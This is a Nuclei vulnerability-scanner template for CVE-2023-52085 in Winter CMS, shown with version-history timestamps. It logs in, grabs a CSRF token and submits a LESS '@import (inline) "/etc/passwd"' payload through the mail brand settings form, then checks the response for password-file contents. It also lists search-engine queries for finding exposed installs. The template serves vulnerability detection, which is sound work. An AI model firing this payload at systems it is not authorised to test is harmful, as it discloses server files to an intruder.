nuclei-templates/http/cves/2023/CVE-2023-52085.yaml

72 lines
2.4 KiB
YAML
Raw Normal View History

2024-02-02 10:08:58 +00:00
id: CVE-2023-52085
info:
2024-02-08 06:25:29 +00:00
name: Winter CMS Local File Inclusion - (LFI)
2024-02-02 10:08:58 +00:00
author: sanineng
severity: medium
2024-02-08 06:25:29 +00:00
description: |
Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.
2024-02-02 10:08:58 +00:00
reference:
- https://github.com/wintercms/winter/security/advisories/GHSA-2x7r-93ww-cxrq
- https://nvd.nist.gov/vuln/detail/CVE-2023-52085
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
2024-02-08 06:25:29 +00:00
cvss-score: 5.4
2024-02-02 10:08:58 +00:00
cve-id: CVE-2023-52085
cwe-id: CWE-22
epss-score: 0.00256
epss-percentile: 0.64798
cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
2024-02-08 06:25:29 +00:00
metadata:
max-request: 4
2024-02-08 06:25:29 +00:00
vendor: wintercms
product: winter
shodan-query: "title:\"Winter CMS\""
fofa-query: "title=\"Winter CMS\""
2024-02-08 06:25:29 +00:00
tags: cve,cve2023,authenticated,lfi,wintercms
2024-02-02 10:08:58 +00:00
http:
- raw:
2024-02-08 06:32:10 +00:00
- |
GET /backend/backend/auth/signin HTTP/1.1
Host: {{Hostname}}
2024-02-02 10:08:58 +00:00
2024-02-08 06:32:10 +00:00
- |
POST /backend/backend/auth/signin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2024-02-02 10:08:58 +00:00
2024-02-08 06:32:10 +00:00
_token={{_token}}&postback=1&login={{username}}&password={{password}}
2024-02-02 10:08:58 +00:00
2024-02-08 06:32:10 +00:00
- |
POST /backend/system/mailbrandsettings HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-WINTER-REQUEST-HANDLER: onSave
X-WINTER-REQUEST-PARTIALS:
X-Requested-With: XMLHttpRequest
2024-02-02 10:08:58 +00:00
2024-02-08 06:32:10 +00:00
_token={{_token}}&MailBrandSetting%5Bbody_bg%5D=%2342445B;@import%20(inline)%20%22/etc/passwd%22&redirect=0
2024-02-02 10:08:58 +00:00
2024-02-08 06:32:10 +00:00
- |
GET /backend/system/mailbrandsettings HTTP/1.1
Host: {{Hostname}}
2024-02-02 10:08:58 +00:00
host-redirects: true
max-redirects: 3
2024-02-08 06:25:29 +00:00
2024-02-02 10:08:58 +00:00
matchers:
- type: regex
2024-02-08 06:25:29 +00:00
part: body_4
2024-02-02 10:08:58 +00:00
regex:
- "root:[x*]:0:0:"
2024-02-08 06:25:29 +00:00
2024-02-02 10:08:58 +00:00
extractors:
2024-02-08 06:35:51 +00:00
- type: regex
part: body
name: _token
group: 1
regex:
- '<input name="_token" type="hidden" value="([0-9a-zA-Z]{40})">'
internal: true
# digest: 4a0a00473045022100edda67cd80bdd516aa4f6241fa72a9e1d6c1e240eb1d40d35ae9c44143ff025902206f496f8d850ad284d589527d8abd90bf13aa0414c007dad56d79ba9c57d33c59:922c64590222798bb761d5b6d8e72950